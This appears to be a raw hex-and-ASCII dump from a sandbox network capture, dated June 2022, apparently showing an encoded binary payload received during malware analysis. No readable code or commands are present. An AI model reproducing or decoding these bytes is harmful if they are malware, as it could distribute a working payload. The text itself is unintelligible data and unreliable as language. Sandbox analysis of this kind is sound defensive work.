                                2022-06-26 07:43:17 UTC675INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:43:17 UTC679INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
                                2022-06-26 07:43:17 UTC683INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:43:17 UTC687INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:43:17 UTC692INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:43:17 UTC696INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
                                2022-06-26 07:43:17 UTC700INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:43:17 UTC703INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:43:17 UTC707INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
                                2022-06-26 07:43:17 UTC711INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:43:17 UTC715INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:43:17 UTC719INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:43:17 UTC724INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
                                2022-06-26 07:43:17 UTC728INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:43:17 UTC732INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
                                2022-06-26 07:43:17 UTC735INData Raw: fc 57 57 f7 82 f9 23 51 2d e9 c7 0c 6f ad c7 ad 7b 86 00 16 56 e0 6c 6c 6c 63 e6 c8 ba 25 15 7f ee ac ac 2c 39 3b d3 d2 df 10 2a 31 85 37 86 fe 10 10 b0 25 f1 e0 19 21 12 88 ee 95 1f 2e e7 2b c1 e2 cb d8 22 35 f3 d6 0c eb da 27 d6 1a b6 1a de 25 6d ce 17 f3 d8 ac e7 61 25 25 25 25 24 20 73 69 d3 67 85 a7 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: WW#Q-o{Vlllc%,9;*17%!.+"5'%ma%%%%$ sig%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:17 UTC739INData Raw: 4d 41 ff e3 b7 a0 66 07 74 70 3c e9 ac ac 6b c4 02 a2 ed 7f 9a 72 c7 f9 b1 bb cc b1 d2 34 bd ee e0 cd ba 96 60 60 66 43 40 f3 67 fe 13 9a a3 82 99 b2 44 d7 fb ca 00 fb bd ed c9 23 ef fa 71 93 5b 76 44 8f 8f 17 56 d9 46 d3 01 9c c1 bd 85 b7 0b 80 be 1d ce 5f 7a e2 2d 55 33 e9 75 38 fd 91 9b 53 3a e3 71 22 a2 78 ec b6 1d a5 2f 1e c5 e8 02 6a 0e 06 79 45 fc 5b 64 03 86 98 41 84 0d f6 dc c5 1f 14 98 1f 51 f1 f6 12 93 c5 4d 57 0c 0c 0c be 73 f5 48 92 be dd 7b 66 4c 5c c3 cb ae 42 94 ff f2 e7 07 30 20 e9 3f ee a2 7d 3b 45 e9 35 a5 ae c4 09 f9 84 2e 29 e0 44 6d 24 24 cc 5f 3c 2a 2a ea 40 40 40 c9 8f 38 11 84 df 65 3a 69 57 4a 91 fd 5d 91 c3 e5 33 15 83 e6 ce 07 a0 66 f9 b0 b0 87 8e b4 a4 ef ef 67 82 e6 80 90 d0 2f c2 f3 78 82 90 90 70 68 f6 ba 49 49 89 3f 00 00
                                Data Ascii: MAftp<kr4``fC@gD#q[vDVF_z-U3u8S:q"x/jyE[dAQMWsH{fL\B0 ?};E5.)Dm$$_<**@@@8e:iWJ]3fg/xphII?
                                2022-06-26 07:43:17 UTC743INData Raw: 23 2c e3 0c 24 3b 6c 3d 5d 92 98 80 1b 5c 28 ae 7d 6b 39 42 18 25 2e 30 47 29 12 fe af 54 63 0e cb 46 23 71 a3 31 ce 07 b3 cd 8f c1 66 cf d7 98 c4 28 73 e0 e0 dc 5c db 12 aa 05 46 f5 5b fb 60 24 36 21 59 be 19 06 5b dd d7 1e 65 55 6c aa 37 4c 66 21 d4 ec a8 f6 ef fb fd 8b ea a2 73 7f 55 4d 2e a1 9c 4d 2e bd a5 02 d2 e1 9b 20 c7 1a b9 bb ab fd 73 f3 80 42 94 09 ff 6f ca b9 18 f0 c9 5f 81 92 52 4b 75 dc e9 52 35 0f e0 61 09 78 79 f0 af 00 89 0a a4 68 16 7d f3 cd 18 fe 62 46 b9 51 9f ef be a4 49 0c 2e 4b 27 53 36 53 be bc 76 22 b7 cd 3e 0f b0 e7 c9 8b a8 b2 6e 9f 65 69 13 c7 00 85 c6 e0 51 82 3d 43 37 ad 0f d1 33 97 f2 ab d5 8f 00 16 f5 5f 44 89 3a 09 70 3a a5 e5 af 08 9c f1 5e 43 f8 e5 d3 5c 4f ba ed 6e 4c 84 d9 f2 07 78 46 3c 62 07 a1 1f 68 a6 fc 4e a0 02
                                Data Ascii: #,$;l=]\(}k9B%.0G)TcF#q1f(s\F[`$6!Y[eUl7Lf!sUM.M. sBo_RKuR5axyh}bFQI.K'S6Sv">neiQ=C73_D:p:^C\OnLxF<bhN
                                2022-06-26 07:43:17 UTC747INData Raw: 68 b7 0e 54 96 1f 6a b3 8d 2c 6c b1 29 ff d4 ec d7 47 31 95 47 5c fd 81 12 24 01 78 f4 44 c4 2b c7 ff 91 89 e3 4c 4e 75 9d b3 7f 73 41 8f be 07 92 d5 c3 37 99 35 eb 97 6f c4 f7 4c b6 6f 07 a4 11 79 e8 7c 07 5f b8 da 2c ea 16 d1 75 76 4b af 03 f4 92 26 69 ff bf 66 6a a2 1d eb c9 4e d3 1b 25 0c d8 cf 9a 84 41 e5 30 38 65 db 4d fb 16 5c bd 53 7f 59 74 04 d3 5f 5d 56 22 95 b6 86 20 82 f7 ea 84 ed 15 fd cf 50 79 63 3b 00 53 08 c9 d5 88 ad 1b de 76 98 85 a2 73 97 dd 5c f5 03 71 cd cb 8b 3f ff 23 24 82 ba 34 e9 0f 11 02 a9 de 6b d0 d3 2e fa 76 85 5a c1 5b 1d 4e b5 e4 55 3e 71 ef a5 da 4d f4 92 9c 01 9d 0c de 09 55 ae e6 23 d4 8b cf 19 88 28 30 26 76 b4 55 8f 2b 21 e9 e9 fb dc f8 8f 86 d0 d5 f4 4d 8c a2 ea 9f 67 6c 43 3d 10 05 8a 3e e9 b1 3a f0 97 95 fa 8a 3f 4f
                                Data Ascii: hTj,l)G1G\$xD+LNusA75oLoy|_,uvK&ifjN%A08eM\SYt_]V" Pyc;Svs\q?#$4k.vZ[NU>qMU#(0&vU+!MglC=>:?O
                                2022-06-26 07:43:17 UTC751INData Raw: 39 dc 7e 73 79 c2 4b 51 dc 98 33 f8 48 e4 e1 62 e4 9e 3f 72 45 27 04 4e 05 31 69 a4 15 c2 1e 11 1d 78 50 60 9d df fc 8d 08 2f 4a 80 5d 0c a5 d0 9d 46 11 19 9f 59 68 16 49 89 7e 3a ea 4f c3 11 79 f1 68 d7 9d ef 70 10 10 df 8f 5e d7 bf 08 b0 6d 7c 34 d3 49 4f 88 dd ae 12 c3 23 a3 54 e7 82 09 89 f5 df 1f ba 58 56 cb 64 12 3a 3c b6 75 6f 03 59 62 be 28 5c 08 32 bf 8f f5 05 4e 22 5f 81 25 83 d1 66 ee 90 95 f7 ce 42 b1 ad 3d c4 75 ba 04 aa 11 69 c4 35 7a 88 06 e0 5d 73 ac 33 79 58 3d 28 61 b5 3c 72 c5 e7 bf 56 60 b9 b1 a2 f5 b6 8e b0 6e 29 f2 18 25 b7 52 2d 3f fa 52 cf 5e f3 c1 08 b0 0a 0d 4f 17 7e 8a 04 a2 c5 70 1d bc 0a ec 34 52 44 50 e8 df 8b 09 b2 ca 98 ea b8 01 86 6e f6 d7 22 b1 9a 69 9c d2 c5 9f cc f1 a1 52 47 5e 44 61 30 60 2c f9 df 6f 87 18 bb bd 2d 65
                                Data Ascii: 9~syKQ3Hb?rE'N1ixP`/J]FYhI~:Oyhp^m|4IO#TXVd:<uoYb(\2N"_%fB=ui5z]s3yX=(a<rV`n)%R-?R^O~p4RDPn"iRG^Da0`,o-e
